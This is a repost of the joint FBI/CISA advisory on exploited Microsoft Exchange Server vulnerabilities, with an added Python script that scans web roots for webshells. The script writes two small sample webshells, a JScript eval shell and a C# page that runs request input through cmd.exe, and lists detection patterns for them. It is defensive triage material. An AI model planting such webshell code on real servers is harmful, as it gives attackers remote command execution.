Compromised? Joint FBI and CISA Cybersecurity Advisory on Microsoft Exchange Server Vulnerabilities

According to the recent joint FBI and CISA Cybersecurity Advisory on Microsoft Exchange Server vulnerabilities, successful exploitation allows an attacker to access victims' Exchange Servers, gain persistent system access, and take control of an enterprise network. The activity has the potential to affect tens of thousands of systems in the United States and provides adversaries with access to networks containing valuable research, technology, personally identifiable information (PII), and other sensitive information from entities in multiple U.S. sectors.


Content Assessment: Compromised? Joint FBI and CISA Cybersecurity Advisory on Microsoft Exchange Server Vulnerabilities

Information 95% | Insight 95% | Relevance 95% | Objectivity 95% | Authority 95%

Overall: 95% (Excellent)

A short percentage-based assessment of the qualitative benefit of the post highlighting the Joint FBI and CISA Cybersecurity Advisory on Microsoft Exchange Server vulnerabilities.

Editor’s Note: According to the Cybersecurity and Infrastructure Security Agency (CISA), active exploitation of vulnerabilities in Microsoft Exchange Server products has been observed. Successful exploitation of these vulnerabilities allows an unauthenticated attacker to execute arbitrary code on vulnerable Exchange Servers, enabling the attacker to gain persistent system access, as well as access to files and mailboxes on the server and to credentials stored on that system. Successful exploitation may additionally enable the attacker to compromise trust and identity in a vulnerable network. Microsoft released out-of-band patches to address the vulnerabilities in Microsoft Exchange Server. The vulnerabilities affect on-premises Microsoft Exchange Servers and are not known to affect Exchange Online or Microsoft 365 (formerly O365) cloud email services. The following joint advisory from CISA and the Federal Bureau of Investigation (FBI) highlights the cyber threat associated with this active exploitation.

Joint Cybersecurity Advisory from the Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA)*

Compromise of Microsoft Exchange Server

This Joint Cybersecurity Advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) framework, Version 8. See the ATT&CK for Enterprise framework for referenced threat actor techniques and for mitigations.

Summary

This Advisory is the result of analytic efforts between the Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) to highlight the cyber threat associated with active exploitation of vulnerabilities in Microsoft Exchange on-premises products. The FBI and CISA assess that nation-state actors and cyber criminals are likely among those exploiting these vulnerabilities. The exploitation of Microsoft Exchange on-premises products poses a serious risk to Federal Civilian Executive Branch agencies and private companies. Successful exploitation of these vulnerabilities allows an attacker to access victims’ Exchange Servers, enabling them to gain persistent system access and control of an enterprise network. It has the potential to affect tens of thousands of systems in the United States and provides adversaries with access to networks containing valuable research, technology, personally identifiable information (PII), and other sensitive information from entities in multiple U.S. sectors. FBI and CISA assess that adversaries will continue to exploit these vulnerabilities to compromise networks and steal information, encrypt data for ransom, or even execute a destructive attack. Adversaries may also sell access to compromised networks on the dark web.

On March 2, 2021, Microsoft and Volexity announced the detection of multiple zero-day exploits used to target vulnerabilities in on-premises versions of Microsoft Exchange Servers. In light of this public announcement, FBI and CISA assess that other capable cyber actors are attempting to exploit these vulnerabilities before victims implement the Microsoft updates.

The FBI and CISA have reports of malicious cyber actors using zero-day exploits CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065 to gain access [T1190] to on-premises Microsoft Exchange servers of U.S. entities as early as January 2021. Various Tactics, Techniques, and Procedures (TTPs) have been identified, but the actor(s) frequently appeared to be writing webshells [T1505.003] to disk for initial persistence, conducting further operations to dump user credentials [T1003], adding/deleting user accounts as needed [T1136], stealing copies of the Active Directory database (NTDS.dit) [T1003.003], and moving laterally to other systems and environments. The actors appear to be collecting [T1114], compressing [T1560.001], and exfiltrating mailbox data.
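The persistence technique the advisory lists first, webshells written to disk [T1505.003], is the one a responder can check for most quickly. The triage script below is added here as an example; it is not part of the advisory and is not code from the FBI, CISA, Microsoft or ComplexDiscovery. It walks a web root (in practice the IIS wwwroot and Exchange FrontEnd\HttpProxy trees, or a forensic copy of them mounted on an analysis workstation), reads every file that IIS would execute as server-side code, and flags files whose content matches a small heuristic indicator set. The indicator patterns, the directory names and the sample files are assumptions constructed for this example, not published indicators of compromise; the official IOCs are in the CISA Alert the advisory refers to.

```python
"""Triage helper for the webshell-persistence TTP (ATT&CK T1505.003) named in the advisory.

Walks an Exchange/IIS web root (or a forensic copy of one), reads every file that IIS
would execute as server-side code, and reports files whose content matches heuristic
webshell indicators. The indicator list, directory names and sample files below are
assumptions constructed for this example; they are not IOCs published by the FBI, CISA
or Microsoft.
"""
from __future__ import annotations

import re
import tempfile
from pathlib import Path

# File types IIS/ASP.NET will compile and execute on request.
SERVER_SIDE_EXTENSIONS = {".aspx", ".ashx", ".asmx", ".asp"}

# Heuristic content indicators (assumed for this example). Each is something a legitimate
# Exchange page has little reason to contain: evaluating request input as code, spawning
# processes, loading assemblies at runtime, or a server-side JScript block.
INDICATORS = {
    "eval_of_request": re.compile(r"eval\s*\(\s*Request", re.IGNORECASE),
    "request_to_process": re.compile(r"Process(StartInfo|\.Start)", re.IGNORECASE),
    "dynamic_assembly": re.compile(r"Assembly\.Load|CompileAssemblyFromSource", re.IGNORECASE),
    "jscript_runat_server": re.compile(
        r'language\s*=\s*"?jscript"?[^>]*runat\s*=\s*"?server"?', re.IGNORECASE),
    "base64_decode": re.compile(r"FromBase64String", re.IGNORECASE),
}


def score_file(path: Path) -> list[str]:
    """Return the names of the indicators whose pattern occurs in the file."""
    try:
        text = path.read_text(errors="replace")
    except OSError:
        return []
    return [name for name, pattern in INDICATORS.items() if pattern.search(text)]


def scan_web_root(root: Path, min_indicators: int = 1) -> dict[str, list[str]]:
    """Map each suspicious server-side file (path relative to root) to its matched indicators."""
    findings = {}
    for path in sorted(root.rglob("*")):
        if not path.is_file() or path.suffix.lower() not in SERVER_SIDE_EXTENSIONS:
            continue
        hits = score_file(path)
        if len(hits) >= min_indicators:
            findings[path.relative_to(root).as_posix()] = hits
    return findings


def build_sample_tree(root: Path) -> None:
    """Write a constructed sample web root: two benign files and two webshell-like pages."""
    samples = {
        # Benign OWA-style page: ordinary markup, no indicators.
        "owa/auth/logon.aspx": '<%@ Page Language="C#" %>\n<html><body><h1>Outlook</h1></body></html>\n',
        # Benign client script; not a server-side extension, so it is never scored.
        "owa/scripts.js": "document.title = 'Outlook';\n",
        # One-line JScript shell that evaluates attacker-supplied request data as code.
        "aspnet_client/system_web/help.aspx": (
            '<script language="JScript" runat="server">'
            'function Page_Load(){eval(Request["cmd"],"unsafe");}</script>\n'
        ),
        # C# shell that passes request data to a new cmd.exe process.
        "ecp/shell.aspx": (
            '<%@ Page Language="C#" %>\n'
            '<% var psi = new System.Diagnostics.ProcessStartInfo("cmd.exe", "/c " + Request["c"]);\n'
            '   System.Diagnostics.Process.Start(psi); %>\n'
        ),
    }
    for rel, content in samples.items():
        target = root / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text(content)


def demo() -> dict[str, list[str]]:
    """Build the sample tree in a temporary directory and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        build_sample_tree(root)
        return scan_web_root(root)


if __name__ == "__main__":
    for rel_path, hits in demo().items():
        print(f"{rel_path}: {', '.join(hits)}")
```

Run it against a copied web root rather than the live server where possible, and treat a hit as a lead rather than a verdict: compare the file against a known-good Exchange installation of the same build, check its creation time against the exploitation window, and preserve the file before removing it. The advisory's remaining TTPs (credential dumping, NTDS.dit theft, lateral movement, mailbox exfiltration) mean a webshell is usually the start of the investigation, not the end of it.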

This information has been shared with multiple U.S. government (USG) agencies and partners.

The FBI is proactively investigating this malicious cyber activity, leveraging specially trained cyber squads in each of its 56 field offices, and CyWatch, the FBI’s 24/7 operations center and watch floor, which provides around-the-clock support to track incidents and communicate with field offices across the country and partner agencies. Sharing technical and/or qualitative information with the FBI and CISA helps empower and amplify our capabilities as federal partners to collect and share intelligence and engage with victims while working to unmask—and hold accountable—those conducting cyber activities.

See the CISA Remediating Microsoft Exchange Vulnerabilities web page for both executive- and technical-level guidance. Additionally, refer to the following CISA Alert for full technical details that address the four vulnerabilities in Microsoft Exchange Servers and associated IOCs.


Read the Complete Advisory (PDF)

Joint Cybersecurity Advisory – Compromise of Microsoft Exchange Server – 031021

Read the advisory from the original source.


Background Information

What is the Cybersecurity and Infrastructure Security Agency? The Cybersecurity and Infrastructure Security Agency (CISA) is the Nation’s risk advisor, working with partners to defend against today’s threats and collaborating to build more secure and resilient infrastructure for the future. CISA builds the national capacity to defend against cyber attacks and works with the federal government to provide cybersecurity tools, incident response services and assessment capabilities to safeguard the ‘.gov’ networks that support the essential operations of partner departments and agencies.

What is the FBI? The FBI is an intelligence-driven and threat-focused national security organization with both intelligence and law enforcement responsibilities. It is the principal investigative arm of the U.S. Department of Justice and a full member of the U.S. Intelligence Community. The FBI has the authority and responsibility to investigate specific crimes assigned to it and to provide other law enforcement agencies with cooperative services, such as fingerprint identification, laboratory examinations, and training. The FBI also gathers, shares, and analyzes intelligence, both to support its own investigations and those of its partners and to better understand and combat the security threats facing the United States.

*Shared with permission under Creative Commons – Attribution (BY) 4.0 – license.

Source: ComplexDiscovery
